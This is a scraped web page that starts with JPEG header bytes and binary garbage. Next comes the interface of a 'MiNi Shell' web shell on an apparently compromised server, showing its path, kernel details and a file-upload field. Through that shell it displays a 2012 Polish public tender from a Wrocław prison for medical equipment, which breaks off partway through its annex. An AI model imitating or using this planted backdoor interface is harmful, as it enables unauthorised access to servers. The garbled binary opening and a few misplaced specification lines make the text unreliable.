JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120619/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120619/133717-N-2012.html

<p class="kh_header"><b>Wrocław: Dostawa sprzętu medycznego</b><br>
<b>Numer ogłoszenia: 133717 - 2012; data zamieszczenia: 19.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Karny nr 1 , ul. Kleczkowska 35, 50-211 Wrocław, woj. dolnośląskie, tel. 071 3272600.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Zakład Karny.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa sprzętu medycznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część I
System Holtera ciśnienia tętniczego - 1 szt.; Kod CPV- 33100000-1 Urządzenia medyczne
a)	Wymagane parametry rejestratora ciśnienia tętniczego metodą Holtera:
-metoda pomiaru oscylometryczna;
-pomiar ciśnienia skurczowego i rozkurczowego oraz średniego;
-pomiar częstości rytmu;
-możliwość podziału okresu badań na min. 3 podokresy;
-możliwość programowania cykli pomiarowych;
-posiada koszyk lub wieszak do rozmrażania osocza, Czas rejestracji większy niż 24 godziny;
-możliwość rozpoczęcia badania bez podłączenia do komputera;
-pomiar na żądanie;
-wyświetlacz alfanumeryczny;
-automatyczny dobór ciśnienia w rękawie pacjenta;
-możliwość wyświetlania na ekranie zmierzonych wartości;
-możliwość zablokowania wyświetlacza;
-współpraca z komputerem klasy PC poprzez port USB;
-wykrywanie błędnych pomiarów oraz powtórka pomiaru;
-kabel łączący komputer z rejestratorem w zestawie;
-zasilanie rejestratora: maksymalnie 2 baterie AA lub akumulatorki;
-mankiety pomiarowe o rozmiarach w zestawie: S o wymiarach 20-24cm, M o wymiarach 24-32cm, L o wymiarach 32-38cm, XL o wymiarach 38-55cm;
-wymagany skład kompletu: rejestrator, 4 rozmiary wielorazowych mankietów pomiarowych wyposażonych w elastyczne rękawy zapobiegające zsuwaniu się z ramienia, specjalny futerał z paskami do noszenia rejestratora, komplet akumulatorków AA (4szt.) , ładowarka do akumulatorków, miarka do pomiaru obwodu ramienia;
-dopuszczenia certyfikaty zgodnie z obowiązującymi przepisami.
b) Wymagania dotyczące parametrów technicznych oprogramowania:
-wbudowana baza danych pacjentów i badań;
-możliwość przeglądania wyników pomiarów w formie tabeli;
-automatyczna eliminacja błędnych pomiarów;
-możliwość wprowadzenia uwag;
-prezentacja wyników pomiarów w formie wykresów;
-prezentacja histogramów ciśnienia skurczowego, rozkurczowego oraz HR;
-zaznaczanie na wykresie wartości progowych oddzielnie dla każdego podokresu;
-obliczenie procentu pomiarów przekraczających wartości progowe dla całości badania i poszczególnych podokresów;
-wyliczenie takich wartości jak: ciśnienia maksymalne, średnie i minimalne dla całości badania jak i dla każdego podokresu;
-funkcja eksportu danych;
-możliwość archiwizacji danych;
-możliwość konfiguracji parametrów pomiarowych;
-możliwość konfiguracji raportu;
-możliwość tworzenia raportów w postaci plików PDF;
-funkcja przesyłania raportów za pomocą poczty elektronicznej.

Część II
System Holtera do EKG - 1 szt.; Kod CPV- 33100000-1 Urządzenia medyczne

a)	Wymagania dotyczące analizatora holterowskiego EKG:
-przeglądanie fragmentów EKG w trybie stronicowym;
-przeglądanie EKG w trybie wstęg (strip);
-analiza w trybie prospektywnym i retrospektywnym;
-analiza automatyczna oparta na tworzeniu wzorców pobudzeń;
-automatyczna analiza arytmii komorowych i nadkomorowych;
-automatyczna analiza odcinka ST;
-możliwość konfiguracji parametrów analizy;
-możliwość korekty klasyfikacji każdego pobudzenia;
-automatyczny dobór przykładów ilustrujących epizody arytmii i zmiany odcinka ST;
-baza danych pacjentów i badań;
-możliwość konfiguracji raportu końcowego;
-możliwość analizy zapisów dłuższych niż 36 godzin;
-możliwość analizy zapisów z dwunastu odprowadzeń;
-możliwość wyboru analizowanych kanałów od 1 do 3;
-możliwość ustawienia punktów pomiarowych ST niezależnie dla każdego kanału;
-natychmiastowy dostęp do zapisu EKG z dowolnego poziomu analizy (tabele, trendy);
-możliwość prezentacji pobudzeń z danej klasy w trybie stronicowym;
-możliwość bezpośredniej edycji tabeli arytmii;
-analiza epizodów obniżenia odcinka ST z uwzględnieniem rodzaju nachylenia;
-automatyczna kalibracja;
-możliwość wyłączenia z analizy fragmentów zapisu;
-analiza czasowa HRV , prezentacja wyników w formie graficznej;
-analiza spektralna HRV, prezentacja wyników w formie graficznej;
-archiwizacja bazy danych;
-licencjonowane oprogramowanie;
-system zainstalowany na dedykowanym stanowisku z mobilnym stolikiem pod zestaw, wyposażonym w komputer PC typu laptop z systemem operacyjnym Windows 7 lub nowszym, o przekątnej monitora min. 15,4, drukarka laserowa A4 (proszę podać skład zestawu oraz podstawowe parametry oferowanych elementów zestawu);
b)Wymagania dotyczące rejestratora holterowskiego EKG:
-rejestrator cyfrowy;
-liczba rejestrowanych odprowadzeń min. 3;
-czas rejestracji min.48 godziny;
-liczba elektrod max. 7;
-automatyczna rejestracja momentu rozpoczęcia badania (data, godzina);
-rejestracja bez kompresji danych;
-przycisk zdarzeń pacjenta;
-detekcja pików rozrusznika serca;
-zasilanie maksymalnie z 2 baterii AA 1,5V lub akumulatorków;
-kontrola stanu baterii oraz podłączenia elektrod;
-podgląd zapisu EKG na monitorze komputera w czasie rzeczywistym;
-zachowanie danych EKG bez zasilania rejestratora;
-sygnalizacja stanu aktywności rejestratora;
-masa max 200 gram;
-przedmiot oferty będzie fabrycznie nowy;
-instrukcja obsługi przedmiotu oferty w języku polskim;
-przeszkolenie pracownika Zamawiającego w zakresie obsługi przedmiotu oferty.


Część III
Spirometr - 1 szt.; Kod CPV- 33100000-1 Urządzenia medyczne

Parametry jakościowe i cechy techniczno-użytkowe:
-spirometr diagnostyczny - komputerowy;
-zasilanie - port USB;
-czujnik typ - Pneumotach;
-możliwość przeprowadzania testów: FVC, SVC, MVV, Pre-Post BD;
-3 pompy wymuszające cyrkulację płynu podczas procesu dezynfekcji;
-zakres objętości 0-14  l;
-zakres przepływu +/- 14 l/s;
-posiadanie następujących parametrów: FVC, FIVC, FIV1, FIV1%, FEV0.5, FEV1, FEV2, FEV3, FEV5, FEV6, FEVO.5, FEV0.5%, FEV 1%, FEV1/FVC, FEV2%, FEV3%, FEV5%, FEV6%, PEF, FEF,25, FEF50, FEF75, FEF0,2-1,2, FEF25-75, FEF75-85, PIF, FIF50, FEF50/FIF50, FFV1/FEV6, FET, MEF25, MEF50, MEF75, SVC, ERV, IRV, VT, IC, BF, MV, Tin, Tex, Tin/Tex, MVV, MV, VT, BF, Czas, DFRC;
-możliwość tworzenia następujących raportów: FVC - objętość/czas, FVC -przepływ/objętość, FVC - zarówno objętość/czas jak i przepływ/objętość, SVC -objętość/czas;
-dostosowywalne formaty raportów;
-dźwiękowe i wizualne bodźce w instruowaniu pacjentów służące jako pomoc;
-dokładność i powtarzalność wg standardu ATS/ERS 2005;
-pompa kalibracyjna 3 l;
-ustniki jednorazowe - 100 szt. w zestawie;
-wykresy przepływ/czas i przepływ/objętość w czasie rzeczywistym;
-automatyczna interpretacja;
-instrukcje w języku polskim;
-oprogramowanie w języku polskim;
-aparat musi spełniać normy: ATS, NIOSH, OSHA I Social Security.

Część IV
Nosze - transporter - 1 szt.; Kod CPV- 33192160 -1 Nosze
Wymagania techniczno-eksploatacyjne:
-transporter - stół do zabiegów chirurgicznych, opatrunkowych;
-możliwość zmiany wysokości leża pompą hydrauliczną;
-pochyły Trendelenburga i anty- Trendelenburga;
-możliwość unoszenia oparcia pleców wspomagane sprężynami gazowymi z blokadą;
-transporter nie musi być wyposażony w koła ,ale jeżeli będzie to powinien mieć centralną blokadę kół.

Część V
Kontener na materiały sterylizowane - 2 zestawy; 
Kod CPV- 33100000-1 Urządzenia medyczne
Wymagania techniczno-eksploatacyjne:
-kontener narzędziowy wykonany z aluminium w wymiarach zewnętrznych 592x285x157 mm. z pokrywą bezobsługową z tworzywa sztucznego odporną na wysoką temperaturę i ciśnienie pasującą do kontenera z filtrem teflonowym na min. 5000 cykli sterylizacji w kolorze czerwonym 1szt.;
-kontener narzędziowy wykonany z aluminium w wymiarach zewnętrznych 592x285x209mm. z pokrywą bezobsługową z tworzywa sztucznego odporną na wysoką temperaturę i ciśnienie pasującą do kontenera z filtrem teflonowym na min. 5000 cykli sterylizacji w kolorze zielonym 1 szt.;
-kontener narzędziowy wykonany z aluminium w wymiarach zewnętrznych 300x285x157 mm. z pokrywa bezobsługową z tworzywa sztucznego odporną na wysoką temperaturę i ciśnienie pasującą do kontenera z filtrem teflonowym na min. 5000 cykli sterylizacji w kolorze czerwonym 3 szt.;
-kosze do kontenerów ze stali nierdzewnej z rączkami (uchwytami) do przenoszenia o wymiarach zewnętrznych 243x253x106 mm. 2 szt.

Część VI
Kardiomonitor modułowy - 1 szt.; Kod CPV- 33100000-1 Urządzenia medyczne

a)	Wymagane parametry graniczne:
-monitor przystosowany do pracy w sieci;
-modułowa budowa systemu - moduły parametrowe wymienialne między monitorami. możliwość wymiany modułów bez wyłączania monitora;
-typ ekranu: LCD TFT;
-posiadanie kanałów dynamicznych (proszę o podanie ilości kanałów w złożonej ofercie);
-zasilanie monitora 230V?10% / 50Hz;
-wielopoziomowy system alarmów akustycznych i optycznych (proszę o dokładny opis w złożonej ofercie);
-prezentacja wyników pomiarowych oraz wartości alarmowych w formie numerycznej;
-trendy graficzne mierzonych parametrów.

b)Wymagania związane z pomiarem EKG/ST/Resp:

-minimum 2 odprowadzenia EKG wyświetlane jednocześnie;
-analiza odchylenia odcinka ST;
-analiza arytmii;
-pomiar częstości oddechów (proszę o podanie zakresu w złożonej ofercie);
-ustawianie granic alarmowych częstości akcji serca, odchylenia odcinka ST, częstości oddechu oraz czasu trwania bezdechu;
-kabel EKG 5-cio lub 3 odprowadzeniowy z kompletem elektrod.

c)Wymagania związane z pomiarem ciśnienia metodą nieinwazyjną:
-wyświetlanie wartości ciśnień skurczowego, rozkurczowego i średniego;
-możliwość pomiaru u dorosłych, dzieci i noworodków;
-ustawianie granic alarmowych ciśnienia skurczowego, rozkurczowego i średniego;
-tryb pracy ręczny i automatyczny (podać przedziały czasowe).

d)Wymagania związane z pomiarem saturacji i pletyzmografii:
-zakres pomiarowy saturacji od 40 do 100 %;
-zakres pomiarowy częstości pulsu co najmniej 30-240 P/min;
-ustawianie granic alarmowych %saturacji oraz częstości pulsu;
-czujnik pomiarowy dla dorosłych na palec.

e)Wymagania związane z pomiarem temperatury (dwa kanały):
-wielorazowy czujnik do pomiaru temperatury na powierzchni skóry;
-posiadanie zakresu pomiarowego(podać zakres);
-wieszak pod kardiomonitor mocowany do ściany.


Część VII
Fotel ginekologiczny - 1 szt.; Kod CPV- 33192300-5 Meble medyczne z wyjątkiem łóżek i stołów

Wymagania techniczno-eksploatacyjne:

-fotel przeznaczony do przeprowadzania badań o zabiegów ginekologicznych i urologicznych;
-konstrukcja fotela wykonana z profili stalowych pokrytych lakierem proszkowym;
-tapicerka bezszwowa, odporna na działanie środków dezynfekcyjnych;
-długość fotela do1300 mm;
-szerokość fotela do 650 mm;
-wysokość siedziska: min. 800 mm; 
-funkcja regulacji oparcia pleców (kąt odchylenia co najmniej 60o);
-możliwość uzyskania pozycji leżacej, pozycji Trendelenburga ( kąt przechyłu co najmniej  20 o), pozycji   anty- Trendelenburga (kąt przechyłu co najmniej 10o);
-wymagane wyposażenie fotela: podłokietniki, pojemnik ze stali nierdzewnej, uchwyty ręki, podpora stóp;
-fotel ginekologiczny musi posiadać Deklarację Zgodności CE i rejestrację wyrobu;
-możliwość uzyskania szybkiej pomocy technicznej - do 24 godzin w razie awarii sprzętu.

Część VIII
Wywoływarka do zdjęć RTG stomatologiczna - 1 szt.; 
Kod CPV- 33111500-6 Stomatologiczne aparaty rentgenowskie
Wymagania techniczno-eksploatacyjne:
-wywoływarka półautomatyczna z możliwością podgrzewania odczynników do zdjęć zewnątrzustnych;
-wskaźnik czasu wymiany odczynników;
-system światła dziennego;
-wersja do mocowania na ścianie..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1, 33.19.21.60-1, 33.19.23.00-5, 33.11.15.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 21.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zgodnie z załącznikiem nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zgodnie z załącznikiem nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zgodnie z załącznikiem nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zgodnie z załącznikiem nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zgodnie z załącznikiem nr 3 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dokumenty potwierdzające dopuszczenie oferowanych sprzętów medycznych do obrotu zgodnie z obowiązującymi przepisami (certyfikaty, deklaracje zgodności);</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zp.sw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dział Kwatermistrzowski
Zakładu Karnego Nr 1 
ul. Kleczkowska 35
50-211 Wrocław.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.06.2012 godzina 10:00, miejsce: Sekretariat
Zakładu Karnego Nr 1 
ul. Kleczkowska 35
50-211 Wrocław.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> System Holtera ciśnienia tętniczego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a)	Wymagane parametry rejestratora ciśnienia tętniczego metodą Holtera:
-metoda pomiaru oscylometryczna;
-pomiar ciśnienia skurczowego i rozkurczowego oraz średniego;
-pomiar częstości rytmu;
-możliwość podziału okresu badań na min. 3 podokresy;
-możliwość programowania cykli pomiarowych;
-posiada koszyk lub wieszak do rozmrażania osocza, Czas rejestracji większy niż 24 godziny;
-możliwość rozpoczęcia badania bez podłączenia do komputera;
-pomiar na żądanie;
-wyświetlacz alfanumeryczny;
-automatyczny dobór ciśnienia w rękawie pacjenta;
-możliwość wyświetlania na ekranie zmierzonych wartości;
-możliwość zablokowania wyświetlacza;
-współpraca z komputerem klasy PC poprzez port USB;
-wykrywanie błędnych pomiarów oraz powtórka pomiaru;
-kabel łączący komputer z rejestratorem w zestawie;
-zasilanie rejestratora: maksymalnie 2 baterie AA lub akumulatorki;
-mankiety pomiarowe o rozmiarach w zestawie: S o wymiarach 20-24cm, M o wymiarach 24-32cm, L o wymiarach 32-38cm, XL o wymiarach 38-55cm;
-wymagany skład kompletu: rejestrator, 4 rozmiary wielorazowych mankietów pomiarowych wyposażonych w elastyczne rękawy zapobiegające zsuwaniu się z ramienia, specjalny futerał z paskami do noszenia rejestratora, komplet akumulatorków AA (4szt.) , ładowarka do akumulatorków, miarka do pomiaru obwodu ramienia;
-dopuszczenia certyfikaty zgodnie z obowiązującymi przepisami.
b) Wymagania dotyczące parametrów technicznych oprogramowania:
-wbudowana baza danych pacjentów i badań;
-możliwość przeglądania wyników pomiarów w formie tabeli;
-automatyczna eliminacja błędnych pomiarów;
-możliwość wprowadzenia uwag;
-prezentacja wyników pomiarów w formie wykresów;
-prezentacja histogramów ciśnienia skurczowego, rozkurczowego oraz HR;
-zaznaczanie na wykresie wartości progowych oddzielnie dla każdego podokresu;
-obliczenie procentu pomiarów przekraczających wartości progowe dla całości badania i poszczególnych podokresów;
-wyliczenie takich wartości jak: ciśnienia maksymalne, średnie i minimalne dla całości badania jak i dla każdego podokresu;
-funkcja eksportu danych;
-możliwość archiwizacji danych;
-możliwość konfiguracji parametrów pomiarowych;
-możliwość konfiguracji raportu;
-możliwość tworzenia raportów w postaci plików PDF;
-funkcja przesyłania raportów za pomocą poczty elektronicznej.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> System Holtera do EKG.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a)	Wymagania dotyczące analizatora holterowskiego EKG:
-przeglądanie fragmentów EKG w trybie stronicowym;
-przeglądanie EKG w trybie wstęg (strip);
